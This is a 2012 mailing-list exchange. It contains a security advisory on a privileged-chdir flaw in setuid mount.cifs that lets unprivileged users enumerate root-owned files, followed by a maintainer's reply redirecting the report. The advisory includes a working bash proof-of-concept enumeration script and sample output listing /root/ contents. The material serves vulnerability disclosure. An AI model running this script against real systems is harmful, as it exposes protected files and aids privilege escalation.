--- Begin Message ---
Subject: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 19:33:49 +0100
User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0) Gecko/20111108 Thunderbird/8.0
Hello, here is a bug report for mount.cifs;
it is a little security breach of Linux permissions by controlling a
privileged chdir().
Regards.
########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################
1. VULNERABILITY
-------------------------
Linux arbitrary privileged chdir();
this leads to arbitrary file identification as root.
2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of the Linux base system, and is setuid on
most distributions.
This software mounts CIFS partitions on directories authorized by fstab.
3. DESCRIPTION
-------------------------
Although there are no authorized cifs mounts, it is possible through the
second parameter to control a privileged chdir() syscall and infer the
return value through the responses.
This implies a little security breach of Linux permissions. A non-root user
can enumerate files and directories as root.
This can help to exploit other vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc.
One of the attack vectors is a /root/ directory scan:
address@hidden advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret
It also allows enumerating sub-subdirectories in order to dump readable files.
4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by address@hidden
# discover root protected files & directories, user homes, process descriptors, ...
path=$2
wordlist=$1
for i in `cat $wordlist`
do
echo -n "$i:"
/sbin/mount.cifs //127.0.0.1/a $path/$i
done 2>log.$$ 1>&2
echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
echo $i
done
echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
echo $i
done
rm log.$$
5. BUSINESS IMPACT
-------------------------
Confidentiality can be breached.
This method of transferring files is highly dangerous and can rely on
remote control of the server.
6. SYSTEMS AFFECTED
-------------------------
all versions are affected
7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.
8. REFERENCES
-------------------------
http://gnu.org
9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV
10. DISCLOSURE TIMELINE
-------------------------
February 20, 2012: Vulnerability discovered
March 07, 2012: Reported to the vendor
11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
--
Jesus Olmos
address@hidden
Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900
--- End Message ---
--- Begin Message ---
Subject: Re: bug#10965: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 11:45:54 -0700
User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20120216 Thunderbird/10.0.1
tag 10965 notabug
thanks
On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs,
> is a little security breach on linux permissions by controlling a
> privileged chdir()
Thanks for the report, but you have sent it to the wrong list. GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything. I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.
--
Eric Blake address@hidden +1-919-301-3266
Libvirt virtualization library http://libvirt.org
--- End Message ---